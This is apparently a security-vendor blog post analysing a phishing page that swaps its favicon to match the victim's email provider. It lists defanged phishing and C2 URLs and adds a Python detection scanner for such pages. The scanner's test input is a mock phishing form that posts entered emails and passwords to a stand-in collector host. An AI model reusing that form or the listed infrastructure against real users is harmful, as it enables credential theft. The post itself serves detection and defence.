A Phishing Page that Changes According to the User’s Email Address (Using Favicon)

The ASEC analysis team continuously monitors phishing emails, and we have been detecting multiple phishing emails whose linked page changes its icon to reflect the mail service of the account entered by the user. The following is an email distributed on January 16, 2023, warning users that their account will be shut down and prompting them to click the ‘Reactivate Now’ link if they want to keep their account active. The linked phishing page steals the user’s email account and password.

Figure 1. Distributed email

There are a few noticeable differences between the linked page above and previous cases. In the past, the user’s email address was pre-filled, so the user only needed to enter their password. In this case, however, users had to enter their email address as well. The icon of the phishing page then changes according to the mail service named after the “@” in that address. The threat actor appears to have used the favicon service provided by Google. A favicon is the icon that represents a website or web page. Substituting the desired website address into the ‘domain’ parameter of the Google URL listed below returns that site’s favicon, served by Google.

  • Shortened URL of the linked phishing page: shorturl.at/DGNU2#******.lee@***.com
  • URL of the actual phishing page: hxxps://ipfs[.]io/ipfs/QmRgn9xHYkCoGyj39wQBwfYo7MZ2dtJEh1h9RQ5hcyBqGa?filename=logsinfo.html
  • Google favicon: https://www.google.com/s2/favicons?domain='websiteaddress'
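The traits described above (an email-plus-password form, a favicon fetched from Google’s favicon service with the domain taken from the part after “@” in the email field, and credentials posted to a third-party host) can be checked for in a saved copy of a suspicious page. The following scanner is an added example written for this post; it is not ASEC’s code and not code from the phishing kit. The sample HTML, the host names (`page-host.invalid`, `collector.example.invalid`) and the script fragment are constructed to mimic the behaviour described, not copied from the actual page.

```python
"""Heuristic scan of a saved HTML page for the favicon-adaptive phishing traits
described in the post. Uses only the Python standard library."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Google's favicon endpoint as named in the post ('?' escaped for the regex).
FAVICON_SERVICE_RE = re.compile(r"google\.com/s2/favicons\?domain=", re.I)
# Script code that derives a domain from the text after '@' in an input value.
AT_SPLIT_RE = re.compile(r"""split\(\s*['"]@['"]\s*\)|indexOf\(\s*['"]@['"]\s*\)""")


class CredentialFormParser(HTMLParser):
    """Collects form actions, input types and inline script text from a page."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.input_types = set()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input":
            self.input_types.add((a.get("type") or "text").lower())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data as raw text.
        if self._in_script:
            self.scripts.append(data)


def scan_page(html, page_host):
    """Return a list of finding labels for the page served from page_host."""
    p = CredentialFormParser()
    p.feed(html)
    findings = []
    if "password" in p.input_types and ({"email", "text"} & p.input_types):
        findings.append("credential_form")
    if FAVICON_SERVICE_RE.search(html):
        findings.append("google_favicon_service")
    if AT_SPLIT_RE.search("\n".join(p.scripts)):
        findings.append("domain_from_email_input")
    for action in p.form_actions:
        host = urlparse(action).hostname  # None for relative actions
        if host and host.lower() != page_host.lower():
            findings.append(f"offsite_post:{host}")
    return findings


def verdict(findings):
    """Summarise the findings into a short triage label."""
    core = {"credential_form", "google_favicon_service", "domain_from_email_input"}
    if core <= set(findings):
        return "favicon-adaptive credential phish"
    if "credential_form" in findings and any(f.startswith("offsite_post:") for f in findings):
        return "credential form posting off-site"
    return "no match"


# Constructed sample page imitating the described behaviour (not the real page).
SAMPLE_HTML = """<html><head><link id="fav" rel="icon" href=""></head><body>
<form action="https://collector.example.invalid/logs/gen.php" method="post">
  <input type="email" id="email" name="email">
  <input type="password" name="pass">
  <input type="submit" value="Reactivate Now">
</form>
<script>
  document.getElementById('email').onblur = function () {
    var d = this.value.split('@')[1];
    document.getElementById('fav').href =
      'https://www.google.com/s2/favicons?domain=' + d;
  };
</script></body></html>"""

if __name__ == "__main__":
    f = scan_page(SAMPLE_HTML, "page-host.invalid")
    print(f, "->", verdict(f))
```

The three core signals are deliberately checked separately: a page that only embeds Google’s favicon service is common and benign, while the combination with an email-derived domain and a credential form posting to another host is what matches the kit described here.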

Figure 2. Previously distributed email and phishing page

Figure 3. NAVER favicon

Figure 4. DAUM favicon

Figure 5. Google favicon

The account credentials entered on the page were sent to a particular C2, whose domain is the same as the one covered in a blog post published in January 2023 about a phishing web server. From this, we can assume that the same threat actor is carrying out phishing attacks in various formats. As phishing attacks come in many forms, users must be particularly cautious when opening emails.

  • C2 : hxxps://jy****ud[.]com/service2/online/dollar/sure/logs/gen.php

[IOC Info]

  • hxxps://ipfs[.]io/ipfs/QmRgn9xHYkCoGyj39wQBwfYo7MZ2dtJEh1h9RQ5hcyBqGa?filename=logsinfo.html
  • hxxps://jy****ud[.]com/service2/online/dollar/sure/logs/gen.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post A Phishing Page that Changes According to the User’s Email Address (Using Favicon) appeared first on ASEC BLOG.
